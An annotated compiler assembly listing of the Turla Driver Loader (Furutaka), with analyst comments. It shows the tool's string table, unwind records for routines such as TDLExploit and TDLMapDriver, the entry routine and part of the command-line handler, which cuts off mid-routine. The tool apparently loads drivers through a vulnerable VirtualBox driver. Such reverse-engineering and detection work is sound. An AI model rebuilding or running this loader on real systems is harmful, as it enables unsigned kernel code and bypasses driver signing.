DB 00H, 'e', 00H, 'x', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H DB 'a', 00H, 'd', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't' DB 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ CONST SEGMENT ??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i' DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H DB 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'n', 00H, 't' DB 00H, 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H, 'l', 00H DB '.', 00H, 'e', 00H, 'x', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@ CONST SEGMENT ??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@ DB 'n' DB 00H, 't', 00H, 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H DB 'l', 00H, '.', 00H, 'e', 00H, 'x', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@ CONST SEGMENT ??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'L', 00H, 'o', 00H DB 'a', 00H, 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'n' DB 00H, 't', 00H, 'o', 00H, 's', 00H, 'k', 00H, 'r', 00H, 'n', 00H DB 'l', 00H, '.', 00H, 'e', 00H, 'x', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@ CONST SEGMENT ??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'I', 00H, 'n', 00H DB 
'p', 00H, 'u', 00H, 't', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i' DB 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'f', 00H, 'i', 00H DB 'l', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd' DB 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't', 00H, ' ', 00H DB '0', 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ CONST SEGMENT ??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i' DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H DB 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'i', 00H, 'n' DB 00H, 'p', 00H, 'u', 00H, 't', 00H, ' ', 00H, 'd', 00H, 'r', 00H DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'f', 00H, 'i' DB 00H, 'l', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@ CONST SEGMENT ??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'K', 00H, 'e', 00H DB 'r', 00H, 'n', 00H, 'e', 00H, 'l', 00H, ' ', 00H, 'b', 00H, 'a' DB 00H, 's', 00H, 'e', 00H, ' ', 00H, '=', 00H, ' ', 00H, '0', 00H DB 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'F', 00H DB 'R', 00H, 'E', 00H, 'E', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT 
??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'F', 00H, 'A', 00H, 'S', 00H, 'T', 00H, '_', 00H DB 'D', 00H, 'O', 00H, '_', 00H, 'N', 00H, 'O', 00H, 'P', 00H, 00H DB 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'S', 00H, 'E', 00H, 'T', 00H, '_', 00H, 'V', 00H DB 'M', 00H, '_', 00H, 'F', 00H, 'O', 00H, 'R', 00H, '_', 00H, 'F' DB 00H, 'A', 00H, 'S', 00H, 'T', 00H, ' ', 00H, 'c', 00H, 'a', 00H DB 'l', 00H, 'l', 00H, ' ', 00H, 'c', 00H, 'o', 00H, 'm', 00H, 'p' DB 00H, 'l', 00H, 'e', 00H, 't', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'S', 00H, 'E', 00H, 'T', 00H, '_', 00H, 'V', 00H DB 'M', 00H, '_', 00H, 'F', 00H, 'O', 00H, 'R', 00H, '_', 00H, 'F' DB 00H, 'A', 00H, 'S', 00H, 'T', 00H, ' ', 00H, 'c', 00H, 'a', 00H DB 'l', 00H, 'l', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l' DB 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT 
??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@ CONST SEGMENT ??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@ DB 0dH DB 00H, 0aH, 00H, 09H, 00H, 'D', 00H, 'r', 00H, 'i', 00H, 'v', 00H DB 'e', 00H, 'r', 00H, ' ', 00H, 'i', 00H, 'm', 00H, 'a', 00H, 'g' DB 00H, 'e', 00H, ' ', 00H, 'm', 00H, 'a', 00H, 'p', 00H, 'p', 00H DB 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't', 00H, ' ', 00H, '0' DB 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@ CONST SEGMENT ??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@ DB ',' DB 00H, ' ', 00H, 's', 00H, 'i', 00H, 'z', 00H, 'e', 00H, ' ', 00H DB '=', 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'L', 00H DB 'O', 00H, 'A', 00H, 'D', 00H, ',', 00H, ' ', 00H, 's', 00H, 'u' DB 00H, 'c', 00H, 'c', 00H, 'e', 00H, 's', 00H, 's', 00H, 0dH, 00H DB 0aH, 00H, 09H, 00H, 'S', 00H, 'h', 00H, 'e', 00H, 'l', 00H, 'l' DB 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e', 00H, ' ', 00H, 'm', 00H DB 'a', 00H, 'p', 00H, 'p', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a' DB 00H, 't', 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 
00H, 'U', 00H DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'L', 00H DB 'O', 00H, 'A', 00H, 'D', 00H, ' ', 00H, 'c', 00H, 'a', 00H, 'l' DB 00H, 'l', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H DB 'e', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@ CONST SEGMENT ??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'O', 00H, 'p', 00H DB 'e', 00H, 'n', 00H, 'L', 00H, 'd', 00H, 'r', 00H, '.', 00H, 'u' DB 00H, '.', 00H, 'O', 00H, 'u', 00H, 't', 00H, '.', 00H, 'p', 00H DB 'v', 00H, 'I', 00H, 'm', 00H, 'a', 00H, 'g', 00H, 'e', 00H, 'B' DB 00H, 'a', 00H, 's', 00H, 'e', 00H, ' ', 00H, '=', 00H, ' ', 00H DB '0', 00H, 'x', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'O', 00H DB 'P', 00H, 'E', 00H, 'N', 00H, ' ', 00H, 'c', 00H, 'a', 00H, 'l' DB 00H, 'l', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H DB 'e', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_08EFILHJLF@furutaka@ CONST SEGMENT ??_C@_08EFILHJLF@furutaka@ DB 'furutaka', 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ CONST SEGMENT ??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H DB 'P', 00H, '_', 
00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L' DB 00H, '_', 00H, 'C', 00H, 'O', 00H, 'O', 00H, 'K', 00H, 'I', 00H DB 'E', 00H, ' ', 00H, 'c', 00H, 'a', 00H, 'l', 00H, 'l', 00H, ' ' DB 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H, 'e', 00H, 'd', 00H DB 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@ CONST SEGMENT ??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@ DB 'The Magic Word!', 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@ CONST SEGMENT ??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@ DB 'S' DB 00H, 'o', 00H, 'f', 00H, 't', 00H, 'w', 00H, 'a', 00H, 'r', 00H DB 'e', 00H, '\', 00H, 'O', 00H, 'r', 00H, 'a', 00H, 'c', 00H, 'l' DB 00H, 'e', 00H, '\', 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't', 00H DB 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 00H DB 00H ; `string' CONST ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLMain DD 051501H DD 06a7415H DD 0680115H DD 05006H xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLProcessCommandLine DD 050f01H DD 04a340fH DD 048010fH DD 07008H xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLStopVulnerableDriver DD 060f01H DD 0f640fH DD 0e340fH DD 0700bb20fH xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLStartVulnerableDriver DD 091d01H DD 08f641dH DD 08e341dH DD 088011dH DD 0700cf00eH DD 0500bH xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLMapDriver DD 0b1f01H DD 058341fH DD 050011fH DD 0e00ef010H DD 0c00ad00cH DD 060077008H DD 05006H xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLExploit DD 0d2601H DD 06a7426H DD 0696426H DD 0683426H DD 0620126H DD 0e016f018H DD 0c012d014H DD 05010H xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLResolveKernelImport DD 0c1c01H DD 0c641cH DD 0b541cH DD 0a341cH DD 0f018321cH DD 0d014e016H DD 07010c012H xdata ENDS ; COMDAT xdata xdata SEGMENT $unwind$TDLGetProcAddress DD 040a01H DD 08340aH DD 07006520aH xdata ENDS 
; Unwind records for TDLVBoxInstalled and RtlSecureZeroMemory (the $unwind$
; naming and the xdata segment are the compiler's; the values are left as emitted).
; COMDAT xdata
xdata SEGMENT
$unwind$TDLVBoxInstalled DD 020601H
        DD 030025206H
xdata ENDS
; COMDAT xdata
xdata SEGMENT
$unwind$RtlSecureZeroMemory DD 020501H
        DD 017405H
xdata ENDS
;
; TDLMain -- program entry routine (main.c lines 734-792).
; Flow visible in this listing:
;   1. store the module handle in g_hInstance, initialise the console helper,
;      set the console title and print a banner;
;   2. atomically increment g_lApplicationInstances and exit with -1 when the
;      incremented value is greater than 1;
;   3. call RtlGetVersion and exit with -1 when the dword at offset +4 of the
;      result buffer is below 6;
;   4. record the dword at offset +12 in g_NtBuildNumber and print a version line;
;   5. record the result of TDLVBoxInstalled in g_VBoxInstalled;
;   6. pass GetCommandLineW() to TDLProcessCommandLine and use its return value
;      as the process exit code after decrementing the instance counter.
; Triage note: the string table earlier in this listing carries literals such
; as 'furutaka', 'The Magic Word!', '\drivers\VBoxDrv.sys' and
; 'Software\Oracle\VirtualBox', which make convenient static-match anchors for
; this build; how each one is used is not shown in this excerpt.
;
; Function compile flags: /Ogspy
; COMDAT TDLMain
_TEXT SEGMENT
osv$ = 32
text$ = 320
TDLMain PROC                                            ; COMDAT
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 734
$LN14:
        mov QWORD PTR [rsp+8], rdi
        push rbp
        lea rbp, QWORD PTR [rsp-576]
        sub rsp, 832                                    ; 00000340H
; Line 743
        ; GetModuleHandleW(NULL): handle of the running image.
        xor ecx, ecx
        call QWORD PTR __imp_GetModuleHandleW
; Line 745
        ; Handle is saved globally; cuiInitialize is called with two zero arguments.
        xor edx, edx
        xor ecx, ecx
        mov QWORD PTR g_hInstance, rax
        call cuiInitialize
; Line 747
        ; Console title; the mangled name shows the literal starts "Turla Driver Lo".
        lea rcx, OFFSET FLAT:??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@
        call QWORD PTR __imp_SetConsoleTitleW
; Line 749
        ; Banner text, second argument 1.
        mov edx, 1
        lea rcx, OFFSET FLAT:??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@
        call cuiPrintTextW
; Line 751
        ; Atomic increment of the instance counter; eax ends up holding the new value.
        ; The counter is declared in a segment named 'shrd' at the top of the file --
        ; presumably a section shared between processes; confirm against the linker options.
        mov eax, 1
        lock xadd DWORD PTR g_lApplicationInstances, eax
        inc eax
; Line 752
        ; A value of 1 or less means no other instance was counted: continue.
        cmp eax, 1
        jle SHORT $LN5@TDLMain
; Line 753
        ; Otherwise fall into the shared error exit with a message starting "Another instanc".
        lea rcx, OFFSET FLAT:??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@
$LN13@TDLMain:
; Line 791
        ; Shared error exit: print the message in rcx, set the result to -1.
        xor edx, edx
        call cuiPrintTextW
        or eax, -1                                      ; ffffffffH
        jmp $LN3@TDLMain
$LN5@TDLMain:
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
        ; Inlined zero-fill of the 276-byte osv$ buffer.
        mov edx, 276                                    ; 00000114H
        lea rdi, QWORD PTR osv$[rsp]
        mov ecx, edx
        xor eax, eax
        rep stosb
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 761
        ; First dword of the buffer is set to its size (276) before the call.
        ; NOTE(review): size and field offsets match RTL_OSVERSIONINFOW -- confirm in main.c.
        lea rcx, QWORD PTR osv$[rsp]
        mov DWORD PTR osv$[rsp], edx
        call QWORD PTR __imp_RtlGetVersion
; Line 762
        ; Unsigned compare of the dword at +4 (presumably the major version) against 6.
        cmp DWORD PTR osv$[rsp+4], 6
        jae SHORT $LN6@TDLMain
; Line 763
        ; Below 6: error exit with a message starting "Unsupported Win".
        lea rcx, OFFSET FLAT:??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@
; Line 765
        jmp SHORT $LN13@TDLMain
$LN6@TDLMain:
; Line 768
        ; Dword at +12 is kept in g_NtBuildNumber (stored a few instructions below).
        mov eax, DWORD PTR osv$[rsp+12]
; Line 770
        ; Build the version line in text$: prefix starting "Ldr: Windows v", then the
        ; dwords at +4, +8 and +12 separated by "." and " build ".
        lea rdx, OFFSET FLAT:??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@
        lea rcx, QWORD PTR text$[rbp-256]
        mov DWORD PTR g_NtBuildNumber, eax
        call _strcpy_w
; Line 771
        lea rcx, QWORD PTR text$[rbp-256]
        call _strend_w
        mov ecx, DWORD PTR osv$[rsp+4]
        mov rdx, rax
        call ultostr_w
; Line 772
        lea rdx, OFFSET FLAT:??_C@_13JOFGPIOO@?$AA?4@
        lea rcx, QWORD PTR text$[rbp-256]
        call _strcat_w
; Line 773
        lea rcx, QWORD PTR text$[rbp-256]
        call _strend_w
        mov ecx, DWORD PTR osv$[rsp+8]
        mov rdx, rax
        call ultostr_w
; Line 774
        lea rdx, OFFSET FLAT:??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@
        lea rcx, QWORD PTR text$[rbp-256]
        call _strcat_w
; Line 775
        lea rcx, QWORD PTR text$[rbp-256]
        call _strend_w
        mov ecx, DWORD PTR osv$[rsp+12]
        mov rdx, rax
        call ultostr_w
; Line 776
        mov edx, 1
        lea rcx, QWORD PTR text$[rbp-256]
        call cuiPrintTextW
; Line 782
        ; Result of TDLVBoxInstalled is kept in g_VBoxInstalled.
        call TDLVBoxInstalled
        mov DWORD PTR g_VBoxInstalled, eax
; Line 783
        test eax, eax
        je SHORT $LN7@TDLMain
; Line 784
        ; Non-zero result: print a message starting "Ldr: Detected V".
        mov edx, 1
        lea rcx, OFFSET FLAT:??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@
        call cuiPrintTextW
$LN7@TDLMain:
; Line 787
        ; The raw process command line is handed to TDLProcessCommandLine; eax carries
        ; its return value into the exit path.
        call QWORD PTR __imp_GetCommandLineW
        mov rcx, rax
        call TDLProcessCommandLine
$LN3@TDLMain:
; Line 791
        ; Common exit: release this instance's count, then exit with the value in eax.
        lock dec DWORD PTR g_lApplicationInstances
; Line 792
        mov ecx, eax
        call QWORD PTR __imp_ExitProcess
        int 3
$LN11@TDLMain:
TDLMain ENDP
_TEXT ENDS
;
; TDLProcessCommandLine -- main.c lines 698-723.
; In:  rcx = command-line string (copied to r10 for the helper call).
; Out: eax = -1 unless TDLMapDriver ran, in which case its return value.
; Steps visible here: zero the local path buffer, ask GetCommandLineParamW for a
; parameter, print a usage message when the reported length is 0, print an
; input-file error when GetFileAttributesW returns -1, otherwise call
; TDLStartVulnerableDriver, TDLMapDriver and TDLStopVulnerableDriver in that order.
; The only check on the supplied path in this routine is the attribute query;
; the path itself arrives on the process command line, so process-creation
; logging that records command lines captures it.
;
; Function compile flags: /Ogspy
; COMDAT TDLProcessCommandLine
_TEXT SEGMENT
szInputFile$ = 48
lpCommandLine$ = 592
c$ = 600
TDLProcessCommandLine PROC                              ; COMDAT
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 698
$LN11:
        mov r11, rsp
        mov QWORD PTR [r11+8], rbx
        push rdi
        sub rsp, 576                                    ; 00000240H
; Line 704
        ; [r11+16] is the same slot as c$[rsp] after the prologue; it is cleared here.
        and DWORD PTR [r11+16], 0
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
        lea rdi, QWORD PTR szInputFile$[rsp]
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 698
        mov r10, rcx
; Line 706
        lea r8, QWORD PTR szInputFile$[rsp]
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
        ; Inlined zero-fill of szInputFile$ (522 bytes).
        xor eax, eax
        mov ecx, 522                                    ; 0000020aH
        rep stosb
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 706
        ; GetCommandLineParamW(cmdline, 1, szInputFile, 260, &c).
        ; Presumably copies parameter index 1 into the buffer (capacity 260) and
        ; reports its length through c$ -- confirm against the helper's source.
        ; ebx is preset to -1 and serves as the default return value.
        lea rax, QWORD PTR [r11+16]
        mov rcx, r10
        mov r9d, 260                                    ; 00000104H
        mov QWORD PTR [rsp+32], rax
        mov edx, 1
        or ebx, -1                                      ; ffffffffH
        call GetCommandLineParamW
; Line 707
        cmp DWORD PTR c$[rsp], 0
        jne SHORT $LN2@TDLProcess
; Line 708
        ; c$ == 0: print a message starting "Usage: loader D" and return -1.
        lea rcx, OFFSET FLAT:??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@
; Line 709
        jmp SHORT $LN9@TDLProcess
$LN2@TDLProcess:
; Line 712
        ; A result equal to ebx (-1) from GetFileAttributesW takes the error branch.
        lea rcx, QWORD PTR szInputFile$[rsp]
        call QWORD PTR __imp_GetFileAttributesW
        cmp eax, ebx
        je SHORT $LN3@TDLProcess
; Line 713
        ; Returned handle is stored in g_hVBox; -1 skips the mapping step.
        call TDLStartVulnerableDriver
        mov QWORD PTR g_hVBox, rax
; Line 714
        cmp rax, -1
        je SHORT $LN4@TDLProcess
; Line 715
        ; TDLMapDriver(szInputFile); its result becomes this routine's return value.
        lea rcx, QWORD PTR szInputFile$[rsp]
        call TDLMapDriver
        mov ebx, eax
; Line 716
        ; Called whenever the start step succeeded, whatever TDLMapDriver returned.
        call TDLStopVulnerableDriver
; Line 718
